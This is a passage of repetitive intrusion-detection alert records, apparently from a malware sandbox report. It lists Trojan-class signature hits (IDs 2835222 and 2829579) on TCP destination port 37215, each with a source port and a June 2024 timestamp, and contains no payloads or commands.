                SID:2835222
                Source Port:60492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017308
                SID:2835222
                Source Port:54912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420412
                SID:2829579
                Source Port:53538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023833
                SID:2829579
                Source Port:47392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452358
                SID:2835222
                Source Port:37626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944178
                SID:2835222
                Source Port:57454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984917
                SID:2835222
                Source Port:47462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970992
                SID:2829579
                Source Port:59942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225596
                SID:2829579
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846422
                SID:2829579
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544471
                SID:2835222
                Source Port:39630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149553
                SID:2829579
                Source Port:42688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031954
                SID:2829579
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165421
                SID:2835222
                Source Port:41948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790986
                SID:2829579
                Source Port:34378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762156
                SID:2835222
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292905
                SID:2829579
                Source Port:43486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859900
                SID:2829579
                Source Port:59670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985698
                SID:2829579
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766695
                SID:2835222
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012810
                SID:2835222
                Source Port:59698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999513
                SID:2835222
                Source Port:39812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763243
                SID:2829579
                Source Port:50336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367423
                SID:2829579
                Source Port:51206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181482
                SID:2829579
                Source Port:39204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183160
                SID:2835222
                Source Port:55388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202117
                SID:2829579
                Source Port:60620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546368
                SID:2829579
                Source Port:39444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775376
                SID:2829579
                Source Port:43214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858245
                SID:2829579
                Source Port:37164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879444
                SID:2835222
                Source Port:58900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998492
                SID:2835222
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230225
                SID:2829579
                Source Port:52010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242864
                SID:2829579
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131960
                SID:2835222
                Source Port:56990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293206
                SID:2835222
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291618
                SID:2835222
                Source Port:45248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725049
                SID:2835222
                Source Port:37030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762146
                SID:2829579
                Source Port:52068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245829
                SID:2829579
                Source Port:57954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368699
                SID:2835222
                Source Port:38474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661416
                SID:2829579
                Source Port:60186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881917
                SID:2829579
                Source Port:53170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045758
                SID:2835222
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453169
                SID:2835222
                Source Port:34346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411938
                SID:2829579
                Source Port:33310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150254
                SID:2829579
                Source Port:41738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858449
                SID:2829579
                Source Port:46110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645500
                SID:2829579
                Source Port:40708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858483
                SID:2835222
                Source Port:55018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075208
                SID:2835222
                Source Port:51102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343479
                SID:2829579
                Source Port:52078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898420
                SID:2835222
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184709
                SID:2829579
                Source Port:37328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419697
                SID:2835222
                Source Port:45892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641582
                SID:2829579
                Source Port:48742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150886
                SID:2829579
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198985
                SID:2835222
                Source Port:42770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809402
                SID:2835222
                Source Port:57372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701770
                SID:2829579
                Source Port:51238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940957
                SID:2829579
                Source Port:59372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716030
                SID:2829579
                Source Port:53294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453540
                SID:2835222
                Source Port:59376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915109
                SID:2829579
                Source Port:43672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410089
                SID:2835222
                Source Port:41244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518857
                SID:2829579
                Source Port:49106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381260
                SID:2829579
                Source Port:35706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228110
                SID:2835222
                Source Port:38776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181429
                SID:2835222
                Source Port:50644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164361
                SID:2835222
                Source Port:42658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028497
                SID:2835222
                Source Port:34984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997327
                SID:2835222
                Source Port:51138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766104
                SID:2829579
                Source Port:50840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810493
                SID:2829579
                Source Port:37190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368079
                SID:2835222
                Source Port:44302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451373
                SID:2829579
                Source Port:53874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111723
                SID:2829579
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542779
                SID:2835222
                Source Port:55780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859190
                SID:2829579
                Source Port:36742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943464
                SID:2829579
                Source Port:57740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132885
                SID:2829579
                Source Port:32892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614424
                SID:2829579
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812638
                SID:2829579
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761745
                SID:2829579
                Source Port:40492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793000
                SID:2829579
                Source Port:37976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718076
                SID:2835222
                Source Port:53812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470662
                SID:2829579
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227062
                SID:2829579
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846675
                SID:2829579
                Source Port:60490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203026
                SID:2835222
                Source Port:39978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805301
                SID:2829579
                Source Port:43622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365529
                SID:2835222
                Source Port:39658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762784
                SID:2829579
                Source Port:45156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072626
                SID:2829579
                Source Port:55630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384563
                SID:2829579
                Source Port:39472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027981
                SID:2829579
                Source Port:40294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471678
                SID:2829579
                Source Port:47030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159713
                SID:2835222
                Source Port:57934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988969
                SID:2835222
                Source Port:42192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159223
                SID:2829579
                Source Port:50448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323225
                SID:2835222
                Source Port:39142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075270
                SID:2835222
                Source Port:51516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406210
                SID:2829579
                Source Port:57106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273070
                SID:2829579
                Source Port:33498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.562889
                SID:2835222
                Source Port:44840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700555
                SID:2829579
                Source Port:52712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988063
                SID:2835222
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943628
                SID:2835222
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045626
                SID:2829579
                Source Port:34434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700634
                SID:2835222
                Source Port:33482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201164
                SID:2835222
                Source Port:58346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666134
                SID:2835222
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504925
                SID:2829579
                Source Port:54988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715634
                SID:2829579
                Source Port:38914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805996
                SID:2829579
                Source Port:37474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290348
                SID:2829579
                Source Port:35246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451681
                SID:2835222
                Source Port:56482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383745
                SID:2829579
                Source Port:44810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411391
                SID:2835222
                Source Port:45586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421620
                SID:2835222
                Source Port:46492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014016
                SID:2829579
                Source Port:59502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293355
                SID:2829579
                Source Port:51286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980404
                SID:2829579
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292847
                SID:2829579
                Source Port:51884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519213
                SID:2835222
                Source Port:34344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276514
                SID:2835222
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734265
                SID:2829579
                Source Port:33930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151382
                SID:2835222
                Source Port:33306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734782
                SID:2829579
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470084
                SID:2835222
                Source Port:44352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022169
                SID:2835222
                Source Port:44166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053672
                SID:2835222
                Source Port:58298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243888
                SID:2835222
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849959
                SID:2835222
                Source Port:55014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336046
                SID:2835222
                Source Port:41592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002019
                SID:2829579
                Source Port:46268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011249
                SID:2829579
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860585
                SID:2835222
                Source Port:52942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383203
                SID:2829579
                Source Port:37754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422357
                SID:2829579
                Source Port:38514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452861
                SID:2835222
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022377
                SID:2829579
                Source Port:46512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182821
                SID:2835222
                Source Port:33928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406962
                SID:2835222
                Source Port:50510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543535
                SID:2829579
                Source Port:48132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965642
                SID:2829579
                Source Port:55046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344304
                SID:2829579
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776203
                SID:2829579
                Source Port:47804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564099
                SID:2829579
                Source Port:38426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160042
                SID:2835222
                Source Port:36468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714764
                SID:2835222
                Source Port:55652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011372
                SID:2829579
                Source Port:39670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021930
                SID:2829579
                Source Port:42318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663033
                SID:2829579
                Source Port:58608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966912
                SID:2829579
                Source Port:59506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453229
                SID:2835222
                Source Port:45150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857497
                SID:2835222
                Source Port:56516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055298
                SID:2835222
                Source Port:38558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789773
                SID:2835222
                Source Port:43618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978893
                SID:2829579
                Source Port:35488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502242
                SID:2829579
                Source Port:58938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761970
                SID:2835222
                Source Port:49472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715659
                SID:2829579
                Source Port:56522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471653
                SID:2835222
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290981
                SID:2835222
                Source Port:60768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453588
                SID:2835222
                Source Port:55190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641967
                SID:2829579
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914737
                SID:2835222
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791971
                SID:2829579
                Source Port:43142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383880
                SID:2835222
                Source Port:37528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545076
                SID:2835222
                Source Port:44862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339428
                SID:2835222
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898056
                SID:2835222
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661880
                SID:2829579
                Source Port:51424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991547
                SID:2835222
                Source Port:42484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704602
                SID:2835222
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735016
                SID:2835222
                Source Port:45060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010803
                SID:2829579
                Source Port:60686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972068
                SID:2829579
                Source Port:40798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342502
                SID:2829579
                Source Port:32914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717626
                SID:2829579
                Source Port:43988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012155
                SID:2829579
                Source Port:37124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678726
                SID:2829579
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200093
                SID:2829579
                Source Port:41874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150721
                SID:2835222
                Source Port:42296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977118
                SID:2835222
                Source Port:57124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180815
                SID:2835222
                Source Port:33102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324078
                SID:2829579
                Source Port:51144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849546
                SID:2835222
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111390
                SID:2829579
                Source Port:46606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.278049
                SID:2829579
                Source Port:42220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915396
                SID:2829579
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688942
                SID:2835222
                Source Port:47202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151533
                SID:2835222
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968864
                SID:2829579
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737850
                SID:2829579
                Source Port:38010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846024
                SID:2829579
                Source Port:42258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201773
                SID:2835222
                Source Port:36734
                Destination Port:37215
